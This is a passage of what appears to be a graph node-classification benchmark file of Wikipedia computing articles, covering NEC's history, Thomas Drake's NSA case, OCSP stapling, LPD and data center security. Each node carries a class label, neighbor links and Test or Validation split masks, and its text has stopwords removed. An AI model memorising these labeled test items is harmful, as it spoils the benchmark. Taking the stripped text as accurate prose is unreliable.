1951 nec received deming prize excellence quality control 1952 computer research development began 1954 nec produced first crossbar switching system japan installed nippon telegraph telephone public corporation currently nippon telegraph telephone corporation ntt 1956 nec began joint research development ntt electronic switching systems year nec established taiwan telecommunication company first postwar overseas joint venture 1958 completed neac-1101 neac-1102 computers year 1959 nec demonstrated first transistorized computer neac-2201 demonstrated unesco automath show paris company began integrated circuit research development 1960 1963 nec started trading american depositary receipts ten million shares sold united states nippon electric new york nec america inc. incorporated year nec supplied kdd submarine cable systems laying pacific ocean 1964 supplied short-haul 24 channel pcm carrier transmission equipment ntt 1965 nec de mexico s. a. de c. v. nec brasil s. a. nec australia pty ltd. established 1968 1969 nec supplied comsat corporation spade satellite communications system 1971 1972 switzerland ordered nec satellite communications earth station year small transportable satellite communications earth station set china shares nec common stock listed amsterdam stock exchange 1973 nec also designed automated broadcasting system japan broadcasting corporation year nec electronics europe gmbh also established 1974 acos series computer introduced new central research laboratories completed 1975 1977 japan national space development agency launched nec geostationary meteorological satellite named himawari period nec introduced concept c c integration computers communications nec america inc. opened plant dallas texas manufacture pabx telephone systems 1978 also acquired electronic arrays inc. california year start semiconductor chip production united states 1980 nec created first digital signal processor nec µpd7710 nec semiconductors uk ltd. established 1981 producing vlsis lsis nec introduced 8-bit pc-8800 series personal computer 1981 followed 16-bit pc-9800 series 1982 1983 nec stock listed basel geneva zurich switzerland exchanges nec quickly became dominant leader japanese pc industry holding 80 market share nec changed english company name nec corporation year nec information systems inc. started manufacturing computers related products united states 1984 nec also released v-series processor year 1986 nec delivered sx-2 super computer houston advanced research center woodlands texas year neax61 digital switching system went service 1987 nec technologies uk ltd. established united kingdom manufacture vcrs printers computer monitors mobile telephones europe also year nec licensed technology hudson soft video game manufacturer create video game console called pc-engine later released 1989 turbografx-16 north american market successor pc-fx released japan 1994 pc-engine achieved considerable following said nec held much stronger influence video game industry role leading semiconductor manufacturer direct video game products nec usa inc. established 1989 holding company north american operations 1983 nec brasil brazilian subsidiary nec forced nationalise corporate stock orders brazilian military government whereby shareholder control nec brasil ceded private equity group brasilinvest brazilian investment banker mário garnero since nec brasil foundation 1968 become major supplier telecommunications equipment brazilian government 1986 minister communications antônio carlos magalhães put nec brasil financial difficulties suspending government contract payments company whose main client federal government subsidiary crisis nec corporation japan sold nec brasil organizações globo onemillion us dollars us 1,000,000 shortly thereafter magalhães resumed government contracts corresponding payments nec brazil became valued 350million us dollars us 350,000,000 suspicions regarding nec-globo deal included among things unilateral breach contract globo founder roberto marinho regarding management regional television station brazilian state bahia took national stage 1992 first corruption charges impeached brazilian president fernando collor de mello organizações globo subsequently sold shares nec brazil hit all-time high state monopoly years back nec corporation 1999 following break-up privatisation brazilian state-owned telephone monopoly telebrás 1990 new head office building known super tower completed shiba tokyo additionally joint-venture agreements established manufacture market digital electronic switching systems lsis china 1993 nec asynchronous transfer mode atm switching system neax61 nippon electronic automatic exchange atm service node went service united states nec europe ltd. established holding company european operations year nec c c research laboratories nec europe ltd. opened germany 1994 nec china co ltd. established holding company chinese operations 1996 1997 nec developed 4gbit dram semiconductor group honored one first japan quality awards 1998 nec opened world advanced semiconductor r facility nec 1 personal computer vendor japan 1980s faced increasing competition fujitsu seiko epson ibm japan nevertheless early 1990s nec still largest well 50 market share japanese market competition heated later rival fujitsu started aggressively market computers industry standard x86 instead nec 1997 nec share reduced 35 nec celebrated 100th anniversary 1999 nec electronics corporation separated nec 2002 new semiconductor company nec laboratories america inc. nec labs started november 2002 merger nec research institute neci nec usa computer communications research laboratory ccrl nec built earth simulator computer esc fastest supercomputer world 2002 2004 since produced nec n343i 2006 2003 nec 20.8 market share personal computer market japan slightly ahead fujitsu 2007 nec nissan co. corp. started evaluating joint venture produce lithium ion batteries hybrid electric cars april 23 2009 renesas technology corp nec electronics corp struck basic agreement merge around april 2010 april 1 2010 nec electronics renesas technology merged forming renesas electronics set fourth largest semiconductor company according isuppli published data q3 2010 nec held 19.8 market share pc market japan january 27 2011 nec formed pc joint venture chinese pc maker lenovo fourth largest pc maker world part deal companies said statement establish new company called lenovo nec holdings b.v. registered netherlands nec receive us 175 million lenovo issuance lenovo shares lenovo unit 51 stake joint venture nec hold 49 stake february 2011 bloomberg news said joint venture would allow lenovo expand field servers nec masato yamamoto said nec would able grow china january 26 2012 nec corporation announced would cut 10,000 jobs globally due big loss nec consolidated financial statement line economic crisis europe lagged development smartphones domestic market compare apple samsung previously january 2009 nec cut 20,000 jobs mainly sluggish semiconductor liquid crystal display related businesses 2013 nec biggest pc server manufacturer japan 23.6 share august 2014 nec corporation commissioned build super-fast undersea data transmission cable linking united states japan consortium international companies consisting china mobile international china telecom global global transit google kddi singtel pipeline went online june 30 2016 april 2017 kemet corporation purchase 61 controlling interest nec tokin nec making nec tokin wholly owned subsidiary purchase complete company change name tokin corporation nec structured organization around three principal segments solutions network solutions electronic devices solutions business delivers computing solutions business enterprises government individual customers—in form software hardware related services network solutions business designs provides broadband network systems mobile wireless communications network systems mobile handsets broadcast systems nec electronic devices business includes semiconductors displays electronic components nec produces versa notebooks international market lavie series japanese markets principal subsidiaries nec include defense products include achievements nec include nec ranked consistently top four companies previous five years number u.s. patents issued averaging 1764 year nec main title sponsor davis cup competition 2002 bnp paribas took sponsorship nec 1982 2012 sponsored nec cup go tournament japan nec 1986 2003 sponsored nec shun-ei go tournament young players japan nec sponsored english football club everton 1985 1995 1995 fa cup final triumph everton final game decade-long nec sponsorship danka took sponsors nec signed deal sponsor sauber f1 team 2011 season 2014 season nec signed new deal sponsor sahara force india f1 team 2015 season april 2013 nec became umbrella sponsor pga tour latinoamérica third-tier men professional golf tour nec one sponsored v.league volleyball started works teams years came include professional players nec also used montedio yamagata football soccer j league sponsors along local companies",
    "neighbors": [
      7682,
      6,
      5128,
      5644,
      2071,
      1563,
      1564,
      9245,
      10273,
      6697,
      1083,
      10303,
      7234,
      4172,
      8268,
      10316,
      9812,
      599,
      10339,
      1638,
      6247,
      5736,
      6250,
      6252,
      6253,
      8301,
      1141,
      5237,
      6776,
      10876,
      127,
      11391,
      2179,
      134,
      9863,
      11405,
      9363,
      6834,
      10931,
      11446,
      2235,
      5824,
      8900,
      10960,
      6353,
      8917,
      1753,
      9436,
      8937,
      7916,
      1773,
      8944,
      4856,
      3323,
      11527,
      3343,
      5905,
      5405,
      1833,
      2861,
      2862,
      10030,
      4924,
      321,
      835,
      6468,
      4425,
      2383,
      1376,
      9057,
      3431,
      11631,
      4977,
      3445,
      1400,
      8590,
      10639,
      5523,
      921,
      7068,
      10658,
      5028,
      424,
      426,
      938,
      4011,
      5548,
      9137,
      2995,
      1480,
      2506,
      7638,
      11231,
      3560,
      4590,
      499
    ],
    "mask": "Test"
  },
  {
    "node_id": 8356,
    "label": 4,
    "text": "Thomas_A._Drake:thomas a. drake thomas andrews drake born 1957 former senior executive u.s. national security agency nsa decorated united states air force united states navy veteran whistleblower 2010 government alleged drake mishandled documents one espionage act cases u.s. history drake defenders claim instead persecuted challenging trailblazer project 2011 recipient ridenhour prize truth-telling co-recipient sam adams associates integrity intelligence saaii award june 9 2011 10 original charges dropped drake rejected several deals refused plea bargain truth eventually pleaded one misdemeanor count exceeding authorized use computer jesselyn radack government accountability project helped represent called act civil disobedience drake father world war ii veteran mother secretary pearl s. buck entered u.s. air force 1979 becoming airborne voice processing specialist fluency german went elint electronic intelligence missions capacity encountered surveillance state east germany stasi informed worldview compares developments united states since september 11 attacks drake left air force 1989 also u.s. navy analyzed intelligence national military joint intelligence center according washington post also one time worked cia 1989 drake began work nsa contractor evaluating software contractor worked projects like jackpot librarian becoming expert quality-testing software working system measuring quality computer code nsa drake also continued academic studies 2000 hired software systems quality specialist management information technology consultant columbia maryland-based costal research technology inc. crti wholly owned subsidiary alexandria virginia-based computer systems management inc. csmi late 2001 went work nsa full-time employee signals intelligence directorate fort meade maryland actual first day job nsa employee september 11 2001 2002 became technical director software engineering implementation within cryptologic systems professional health office 2003 drake became process portfolio manager within nsa newly formed directorate engineering held top secret security clearance congressional investigations 9/11 testified nsa failures 2006 reassigned national defense university became nsa chair assistant professor behavioral sciences within industrial college armed forces icaf drake forced leave ndu 2007 security clearance suspended resigned nsa next year drake went work strayer university forced job indictment april 2010 found work apple store founded knowpari systems consulting firm 2011 drake awarded ridenhour prize truth telling co-recipient sam adams associates integrity intelligence saaii award accepting saaii award said references 1857 speech frederick douglass late 1990s early 2000s nsa desired new tools collect intelligence growing flood information pouring new digital networks like internet drake became involved internal nsa debate two tools trailblazer project thinthread project became part minority favored thinthread several reasons including theoretical ability protect privacy us individuals gathering intelligence trailblazer required billions dollars dwarfing cost thinthread drake eventually became disillusioned indignant regarding problems saw agency around 2000 nsa head michael hayden chose trailblazer thinthread thinthread cancelled trailblazer ramped eventually employing ibm saic boeing csc others drake worked way legal processes prescribed government employees believe questionable activities taking place departments accordance whistleblower protection laws intelligence community whistleblower protection act drake complained internally designated authorities bosses nsa inspector general defense department inspector general house senate congressional intelligence committees also kept contact diane roark staffer republicans house intelligence committee u.s. congress house committee responsible oversight executive branch intelligence activities roark staff expert nsa budget two met 2000 september 2002 roark three former nsa officials william binney j. kirk wiebe ed loomis filed dod inspector general report regarding problems nsa including trailblazer drake major source report gave information dod investigation matter roark tried notify superior then-chairman house permanent select committee intelligence porter goss also attempted contact william rehnquist chief justice united states supreme court time addition roark made effort inform vice president dick cheney legal counsel david addington republican staff colleague committee 1980s addington later revealed washington post report author controlling legal technical documents bush administration warrantless surveillance program typing documents tempest-shielded computer across desk room 268 eisenhower executive office building storing vault office roark got response three men 2003 nsa inspector general ig declared trailblazer expensive failure cost 1 billion dollars 2004 dod ig produced final report investigation prompted roark others 2002 report basically agreed assertions found serious flaws nsa time nsa even banned starting projects certain size fear would waste money however plans release dod ig report public time 2011 new yorker article journalist jane mayer wrote drake felt nsa committing serious crimes american people level worse president nixon done 1970s drake reviewed laws regarding disclosure information decided revealed unclassified information reporter worst thing would happen probably would fired november 2005 drake contacted siobhan gorman baltimore sun newspaper sending emails hushmail discussing various topics claims careful give sensitive classified information one basic ground rules set beginning communication communication occurred around 2006 gorman wrote several articles waste fraud abuse nsa including articles trailblazer received award society professional journalists series exposing government wrongdoing judge richard bennett later ruled evidence reporter relied upon allegedly classified information found mr. drake house articles july 2007 armed fbi agents raided homes roark binney wiebe people filed complaint dod inspector general 2002 binney claims pointed guns wife wiebe said reminded soviet union none people charged crimes november 2007 raid drake residence computers documents books confiscated never charged giving sensitive information anyone charge actually brought 'retaining information fbi tried get roark testify drake refused reporter gorman contacted fbi drake initially cooperated investigation telling fbi alleged illegality nsa activities government created 'draft indictment drake prepared prosecutor steven tyrrell listed charges disclosing classified information newspaper reporter conspiracy diane roark binney wiebe loomis complainants dod ig 2002 also allegedly listed unindicted co-conspirators 2009 new prosecutor came case william welch ii changed indictment charges removed naming 'co-conspirators new case contained charges drake prosecutors wanted drake plead guilty refused believed innocent charges government wanted help prosecute whistleblowers refused well later explained motivations ridenhour prizes organization april 2010 drake indicted baltimore maryland grand jury following charges indictment contained many allegations relate actual charges specifically charged unauthorized disclosure classified information charged sigint statute indictment gave details communications roark gorman charged crime directly relating communications indictment also list names gorman roark confirmed reporters e.g mark hosenball newsweek roark lawyer claimed indictment contains mischaracterization facts relationship client drake roark later spoke support drake whistleblowers trailblazer project willful retention charges regarded five documents allegedly related national defense found drake residence five documents question referred success regular meetings volume friend trial testing collections sites success declassified months drake indicted never classified first place according official complaint filed j. william leonard former director information security oversight office regular meetings marked unclassified posted nsanet prosecution argues defendant known really classified drake team also argued latter three five named documents part collection thousands unclassified papers related dod inspector general report mentioned drake defense attorneys argued meant defendant brought home material accidentally willfully obstruction charge related drake allegedly deleting documents purportedly aware fbi investigating leaks media fbi contemplating investigating leaks siobhan gorman baltimore sun false statements charge filed relation fbi questioning drake without lawyer present initial stages investigation cooperating one count alleged statements made regarding whether willfully taken certain documents home another count allegedly lying purported transmission classified information gorman drake defenders point government expert found destroyed evidence also point drake careful give classified information gorman many documents question 'retroactively classified seized home fbi federal offices involved filing indictment included doj public integrity section doj criminal division doj national security division fbi nsa office security counterintelligence drake represented james wyda deborah boardman federal public defenders drake also client government accountability project whistleblower non-profit jesselyn radack director homeland security human rights gap worked drake author nsa authority james bamford consultant drake defense well government prosecutor william m. welch ii previously charged contempt removed ted stevens case served government initial senior litigation counsel john p. pearson doj public integrity section government trial attorney lanny a. breuer charge overseeing prosecution federal judge richard d. bennett responsible hearing handling case initially set trial june 2011 drake case written washington post new york times agence france-press newsweek wired washingtonian.com federation american scientists secrecy news politico elsewhere jesselyn radack government accountability project also discussed case u.s. government publicly stated prosecution thomas drake intended deter government employees reporting problems whistle-blowers key many many department investigations—we n't retaliate encourage matthew a. miller spokesman justice department said indictment brought merits nothing else spring 2011 prosecution made several moves restrict normally open proceedings jury trial united states courtroom reported gerstein politico others done legal auspices classified information procedures act cipa attempts theory prevent release classified information open trials prosecution also moved use controversial silent witness rule exhibits hidden public use code words court government attempted use rule handful times previously legality challenged fifth sixth amendments government also moved restrict cross-examination witnesses restrict jurors reading siobhan gorman baltimore sun articles problems nsa trailblazer prevent defense making arguments introducing evidence courtroom whistleblowing overclassification addition prosecution also court seal two exhibits defense already published one public court filings listed various documents prosecution would try use trial prosecution argued cipa also applied non-classified information attempted unclassified information presented trial redacted form referring siobhan gorman baltimore sun news stories government legally pleaded newspaper articles unduly prejudicial purpose admission newspaper articles put nsa trial prosecution also contended legal obligation prove drake intent harm national security saying prove defendant intended harm country specific part espionage act drake charged 'overclassification defense government argued defense claim would 'confusing jury thus irrelevant charges government also argued discussion trial legal concept whistle-blowing would likewise irrelevant charges early june shortly may 22 2011 broadcast 60 minutes episode drake case government dropped charges drake agreed seek jail time return drake agreement plead guilty single misdemeanor misusing agency computer system july sentencing hearing presiding judge richard d. bennett maryland federal district court issued harsh words government saying unconscionable charge defendant two years home searched list serious crimes could resulted 35 years prison drop 10 counts indictment eve trial expressing irritation prosecution bennett also completely rejected government request 50,000 fine despite sentencing guidelines recommending fine 500- 5,000 noted drake financially devastated spending 82,000 defense losing 154,600 job nsa pension fired university teaching position sentenced drake one year probation 240 hours community service drake appeared daily show august 6 2012 talk history case september sent audio message support cryptoparty march 15 2013 drake spoke national press club luncheon national intelligence community attitude towards whistle-blowing drake inspired edward snowden leak information nsa spying program prism june 2013 snowden went public rather reporting within system due reprisals drake whistleblowers led assistant defense dept inspector general dod ig charge whistleblower unit john crane become whistleblower became apparent drake identity leaked dod ig justice dept drake become activist surveillance state frequently giving interviews speaking events restore fourth one themes speeches interviews privacy exercise follows put entire life box documents bank accounts passwords everything—and give complete stranger—a fellow american safekeeping would states yet encounter yes september 2013 interview drake reaffirmed belief problems nsa chronic systemic solution would completely dismantle subsequently rebuild entire organization july 3 2014 drake along former technical director nsa william binney gave testimony german parliamentary committee investigating nsa spying scandal described close cooperation nsa german secret service bnd november 10 2015 drake appeared pen american center panel newseum secret sources whistleblowers national security free expression drake one four individuals history united states charged specifically willful retention national defense information prosecutions delivery classified information third party—something drake charged particular portion espionage act created 1950 second red scare part mccarran internal security act anthony russo daniel ellsberg first prosecuted retention came known pentagon papers ellsberg gave new york times eventually resulting another landmark espionage act case 1971 new york times co. v. united states prosecution russo ellsberg dismissed 1972 government misconduct second prosecution samuel loring morison 1985 navy analyst sold satellite photographs jane defence weekly later pardoned president bill clinton third american israel public affairs committee case 2005 united states v. franklin rosen weissman drake founding member veteran intelligence professionals sanity september 2015 drake 27 members vips steering group wrote letter president challenging recently published book claimed rebut report united states senate intelligence committee central intelligence agency use torture 2014 documentary called silenced drake featured released nominated emmy award 2016 analogous theme oscar-winning documentary citizenfour portrays similar treatment edward snowden silenced official selection recipient several awards multiple film festivals even release major cable networks march 2015 also 2014 drake involvement thinthread subsequent indictment etc. along others associated activities roark binney wiebe loomis snowden featured pbs documentary united states secrets drake featured throughout 2016 documentary nothing hide regarding government surveillance internet privacy",
    "neighbors": [
      3495,
      6344,
      3305,
      7527,
      10697,
      8750,
      7887,
      208,
      4595,
      7893,
      600,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 8357,
    "label": 4,
    "text": "Great_Seal:great seal great seal seal used head state someone authorised behalf confirm formal documents laws treaties appointments letters dispatch used guarantee authenticity important solemn records documents middle ages great seal played far greater political role much real power associated control seal addition great seal prince usually also privy seal used correspondence private nature seal usually formally entrusted upon office-holder act keeper seal keeper may separate office also usually combined chancellor nowadays great seal usually entrusted upon minister particularly minister justice great seals republics usually show nation coat arms e.g great seal united states allegorical image e.g france reason design used usually remains unchanged seals may however replaced wear depending often seal used monarchies contrast great seal often changed time accession new monarch seal often depicts reigning monarch full form",
    "neighbors": [
      1821
    ],
    "mask": "Test"
  },
  {
    "node_id": 8358,
    "label": 5,
    "text": "OCSP_stapling:ocsp stapling online certificate status protocol ocsp stapling formally known tls certificate status request extension standard checking revocation status x.509 digital certificates allows presenter certificate bear resource cost involved providing online certificate status protocol ocsp responses appending stapling time-stamped ocsp response signed ca initial tls handshake eliminating need clients contact ca aim improving security performance original ocsp implementation number issues firstly introduce significant cost certificate authorities ca requires provide responses every client given certificate real time example certificate issued high traffic website servers cas likely hit enormous volumes ocsp requests querying validity certificate also ocsp checking potentially impairs users privacy slows browsing since requires client contact third party ca confirm validity certificate encounters moreover client fails connect ca ocsp response forced decide continuing connection anyway defeating purpose ocsp b terminating connection based assumption attack could result excessive false warnings blocks ocsp stapling aimed addressing issues original ocsp implementation ocsp stapling resolves problems fashion reminiscent kerberos ticket stapling scenario certificate holder queries ocsp server regular intervals obtaining signed time-stamped ocsp response site visitors attempt connect site response included stapled tls/ssl handshake via certificate status request extension response note tls client must explicitly include certificate status request extension clienthello tls/ssl handshake message may appear allowing site operator control verification responses would allow fraudulent site issue false verification revoked certificate stapled responses ca n't forged need directly signed certificate authority server client receive stapled response contact ocsp server however client receives invalid stapled response abort connection increased risk ocsp stapling notification revocation certificate may delayed last-signed ocsp response expires result clients continue verifiable assurance certificate authority certificate presently valid quite recently longer need individually contact ocsp server means brunt resource burden placed back certificate holder also means client software longer needs disclose users browsing habits third party overall performance also improved client fetches ocsp response directly ca usually involves lookup domain name ca ocsp server dns well establishing connection ocsp server ocsp stapling used certificate status information delivered client already established channel reducing overhead improving performance tls certificate status request extension specified rfc 6066 section 8 rfc 6961 defines multiple certificate status request extension allows server send multiple ocsp responses tls handshake draft proposal x509v3 extension field expired april 2013 specified compliant server presenting certificate carrying extension must return valid ocsp token response status_request extension specified tls client hello current version proposal extended support additional tls extensions tls developer adam langley discussed extension april 2014 article following repair heartbleed openssl bug ocsp stapling support progressively implemented openssl project included support 0.9.8g release assistance grant mozilla foundation apache http server supports ocsp stapling since version 2.3.3 nginx web server since version 1.3.7 litespeed web server since version 4.2.4 microsoft iis since windows server 2008 haproxy since version 1.5.0 f5 networks big-ip since version 11.6.0 kemp loadmasters since version 7.2.37.1 many web servers advertise support ocsp stapling implementations always reliable example apache queries ocsp server event temporary failure discard cached good response previous request start serving bad response nginx lazy loading ocsp responses means first web requests unable add ocsp response browser side ocsp stapling implemented firefox 26 internet explorer since windows vista google chrome linux chrome os windows since vista smtp exim message transfer agent supports ocsp stapling client server modes ocsp stapling designed reduce cost ocsp validation client ocsp responder especially large sites serving many simultaneous users however ocsp stapling supports one ocsp response time insufficient certificate chains intermediate ca certs limitation addressed multiple certificate status request extension specified rfc 6961 adds support sending multiple ocsp responses",
    "neighbors": [
      513,
      517,
      1157,
      9221,
      1288,
      9744,
      1683,
      1688,
      3742,
      2083,
      3237,
      9387,
      11693,
      11569,
      2098,
      9394,
      7736,
      5178,
      9281,
      9412,
      3657,
      5834,
      10831,
      11345,
      6098,
      2003,
      5078,
      4439,
      5590,
      474,
      3805,
      7264,
      865,
      8674,
      7139,
      10341,
      5107,
      501,
      1526,
      2169,
      3707,
      510,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 8359,
    "label": 4,
    "text": "Police_Central_e-Crime_Unit:police central e-crime unit police central e-crime unit pceu part specialist crime directorate metropolitan police service london dedicated combating e-crime england wales northern ireland unit national remit created april 2008 centralise efforts police forces uk excluding scotland fight forms e-crime unit responsibilities quite specific included activities carried bodies excluding activities currently done others unit stated mission improve police response victims e-crime developing capability police service across england wales northern ireland co-ordinating law enforcement approach types e-crime providing national investigative capability serious e-crime incidents pceu created 1 october 2008 responsible improving uk national policing response cyber crime unit housed within specialist crime directorate scd6 part metropolitan police service based central london jurisdiction within england wales northern ireland however unit worked closely scdea scotland international law enforcement pceu seat table europol interpol cyber workstreams since february 2012 pceu presence outside london creation 3 regional hubs hubs located england north west north east midlands areas hubs launched acpo cyber conference sheffield pceu one strands work within acpo e-crime programme led dac janet williams pceu merged national cyber crime unit part new national crime agency",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8360,
    "label": 2,
    "text": "Line_Printer_Daemon_protocol:line printer daemon protocol line printer daemon protocol/line printer remote protocol lpd lpr network printing protocol submitting print jobs remote printer original implementation lpd berkeley printing system bsd unix operating system lprng project also supports protocol common unix printing system cups common modern linux distributions also found mac os x supports lpd well internet printing protocol ipp commercial solutions available also use berkeley printing protocol components robust functionality performance necessary available lpr/lpd cups alone might required large corporate environments lpd protocol specification documented rfc 1179 server lpd protocol listens requests tcp port 515 request begins byte containing request code followed arguments request terminated ascii lf character lpd printer identified ip address server machine queue name machine many different queue names may exist one lpd server queue unique settings note lpd queue name case sensitive modern implementations lpd network printers might ignore case queue name altogether send jobs printer others option automatically create new queue print job new queue name received helps simplify setup lpd server companies e.g d-link model dp-301p+ tradition calling queue name “ lpt1 ” “ lpt1 ” printer supports lpd/lpr sometimes referred tcp/ip printer tcp/ip used establish connections printers clients network although term would equally applicable printer supports internet printing protocol",
    "neighbors": [
      514,
      4002,
      5093,
      3976,
      7626,
      10410,
      3916,
      11147,
      7696,
      6993,
      1877,
      823,
      5531,
      636
    ],
    "mask": "Test"
  },
  {
    "node_id": 8361,
    "label": 3,
    "text": "World_Games_(video_game):world games video game world games sports video game developed epyx commodore 64 1986 versions apple iigs amstrad cpc zx spectrum sega master system contemporary systems also released nes version released milton bradley ported rare virtual console version released europe april 25 2008 game continuation epyx sports line previously released extremely successful titles summer games winter games events available vary slightly depending platform may include game allowed player compete events sequentially choose events choose one event practice event info gave commodore 64 version world games three-plus stars five describing least favorite series stating slalom skiing best event magazine concluded epyx nice consistent job execution tho hard take many points even boring material computer gaming world rick teverbaugh criticized slalom skiing log rolling events difficulty concluded world games still must avid sports games charles ardai called game adequate sequel epyx previous games praised graphics criticized mechanics bizarre little joystick patterns little events still recommended game log rolling event jame trunzo praised game use advanced graphics sound including humorous effects also noted variety included games preventing game getting repetitive game reviewed 1988 dragon 132 hartley patricia kirk lesser role computers column reviewers gave game 5 5 stars",
    "neighbors": [
      9026,
      9006,
      95
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8362,
    "label": 1,
    "text": "Human_Security_Gateway:human security gateway human security gateway database research information related human security additions database made daily contains 27,000 english french-language resources related conflict human security run human security report project gateway focuses attention threats stemming violence individuals societies risk uses approach gathering categorizing information complementary broad conception human security definition human security united nations development programme undp used 1994 human development report gateway offers users catalogued resources including reports journal articles fact sheets coverage ranges global national sub-national levels information available english french via presentation formats gateway searched keyword geographic region subject heading abstract viewed downloading full-text article report subscribers notified additions database filtered topic region language format feeds provided email rss news feed topics include child soldiers climate change conflict prevention criminal violence gender governance health human rights humanitarian intervention international law landmines natural resources peacekeeping post-conflict peacebuilding small arms refugees terrorism",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 8363,
    "label": 4,
    "text": "Data_center_security:data center security data center security set policies precautions practices adopted avoid unauthorized access manipulation data center resources data center houses enterprise applications data hence providing proper security system critical denial service dos theft confidential information data alteration data loss common security problems afflicting data center environments according cost data breach survey 49 u.s. companies 14 different industry sectors participated noticed physical security needed protect value hardware therein cost breach security severe consequences company managing data center customers whose data copied 2012 breach global payments processing vendor visa 1.5 million credit card numbers stolen highlights risks storing managing valuable confidential data result global payments partnership visa terminated estimated lost 100 million defenses exploitable software vulnerabilities often built assumption insiders trusted studies show internal attacks tend damaging variety amount information available inside organizations quantity data stored data centers increased partly due concentrations created cloud-computing common threats data centers common vulnerabilities include many worm attacks data centers exploited well-known vulnerabilities many systems shipped default accounts passwords exploited unauthorized access theft information common attacks include network security infrastructure includes security tools used data center enforce security policies tools include packet-filtering technologies acls firewalls intrusion detection systems idss network-based host-based acls filtering mechanisms explicitly defined based packet header information permit deny traffic specific interfaces acls used multiple locations within data center internet edge intranet server farm following describes standard extended access lists standard acls simplest type acl filtering traffic solely based source ip addresses standard acls typically deployed control access network devices network management remote access example configure standard acl router specify systems allowed telnet standard acls n't recommended option traffic filtering due lack granularity standard aclss configured number 1 99 cisco routers extended acls extended acl filtering decisions based source destination ip addresses layer 4 protocols layer 4 ports icmp message type code type service precedence cisco routers define extended acls name number 100 199 range firewall sophisticated filtering device separates lan segments giving segment different security level establishing security perimeter controls traffic flow segments.firewalls commonly deployed internet edge act boundary internal networks.they expected following characteristics performance main goal firewall separate secured unsecured areas network firewalls post primary traffic path potentially exposed large volumes data hence performance becomes natural design factor ensure firewall meets particular requirements application support another important aspect ability firewall control protect particular application protocol telnet ftp http firewall expected understand application-level packet exchanges determine whether packets follow application behavior deny traffic different types firewalls based packet-processing capabilities awareness application-level information idss real-time systems detect intruders suspicious activities report monitoring system configured block mitigate intrusions progress eventually immunize systems future attacks two fundamental components cisco layer 2 switches provide tools prevent common layer 2 attacks scanning probing dos ddos etc. following security features covered layer 2 security process securing data center requires comprehensive system-analysis approach ongoing process improves security levels data center evolves data center constantly evolving new applications services become available attacks becoming sophisticated frequent trends require steady evaluation security readiness key component security-readiness evaluation policies govern application security network including data center application includes design best practices implementation details result security often considered key component main infrastructure requirement since key responsibility data centers make sure availability services data center management systems often consider security affects traffic flows failures scalability due fact security measures may vary depending data center design use unique features compliance requirements company business goals n't set specific measures cover possible scenarios exist general two types data center security physical security virtual security physical security data center set protocol built-in within data center facilities order prevent physical damage machines storing data protocols able handle everything ranging natural disasters corporate espionage terrorist attacks prevent physical attacks data centers use techniques virtual security security measures put place data centers prevent remote unauthorized access affect integrity availability confidentiality data stored servers virtual network security hard task handle exist many ways could attacked worst part evolving years years instance attacker could decide use malware similar exploits order bypass various firewalls access data old systems may well put security risk contain modern methods data security virtual attacks prevented techniques",
    "neighbors": [
      3704,
      2409,
      6520,
      3852
    ],
    "mask": "Test"
  },
  {
    "node_id": 8364,
    "label": 2,
    "text": "Robert_Love:robert love robert m. love born c. 1981 american author speaker google engineer open source software developer love best known contributions linux kernel notable work including preemptive kernel process scheduler kernel event layer virtual memory subsystem inotify google member android team helped launch first version platform love also active gnome community working networkmanager gnome volume manager project utopia beagle love born 1981 south florida attended graduated charles w. flanagan high school undergraduate studies attended university florida graduated bachelor arts mathematics bachelor science computer science still college love employed kernel hacker montavista software montavista worked procps several kernel-related projects including one notable preemptive kernel love began work ximian december 15 2003 first served senior engineer linux desktop group ximian spearheaded effort named project utopia better integrate hardware management linux desktop ximian acquisition novell love rose position chief architect suse linux enterprise desktop novell worked various kernel gnome projects including inotify beagle love resigned novell may 4 2007 work google mobile device platform android joining project announced engineered several kernel system-level solutions android including novel shared memory subsystem ashmem love continues work google director engineering search infrastructure love lives boston massachusetts love author linux kernel development third edition book understanding developing code linux kernel book widely regarded approachable well written translated several languages three editions published imprints pearson education also wrote linux system programming second edition subtitled talking directly kernel c library published o'reilly media work documents linux system call c library api love also coauthor linux nutshell comprehensive linux command reference also published o'reilly media linux nutshell awarded favorite linux book time linux journal love contributing editor linux journal author articles magazine love invited speak around world including linux.conf.au australia fosdem belgium guadec england keynote speaker love written co-written several books linux operating system",
    "neighbors": [
      1026,
      3082,
      5644,
      5139,
      2581,
      10780,
      10785,
      6691,
      6180,
      8242,
      9266,
      2109,
      6213,
      10822,
      8263,
      8268,
      589,
      4177,
      8787,
      5222,
      10856,
      7793,
      3189,
      4734,
      7812,
      4238,
      10382,
      8848,
      657,
      2195,
      2711,
      6808,
      9882,
      1694,
      6302,
      8354,
      2723,
      1717,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      6352,
      3802,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      10482,
      2294,
      8439,
      2809,
      4360,
      4367,
      11539,
      792,
      7450,
      10016,
      802,
      6947,
      5410,
      295,
      5931,
      823,
      6968,
      7992,
      11069,
      318,
      3911,
      843,
      6988,
      10063,
      11602,
      4437,
      5975,
      6489,
      10091,
      1394,
      1396,
      7540,
      11643,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      10642,
      1939,
      9621,
      3478,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      10687,
      457,
      9696,
      2529,
      6625,
      11232,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 8365,
    "label": 8,
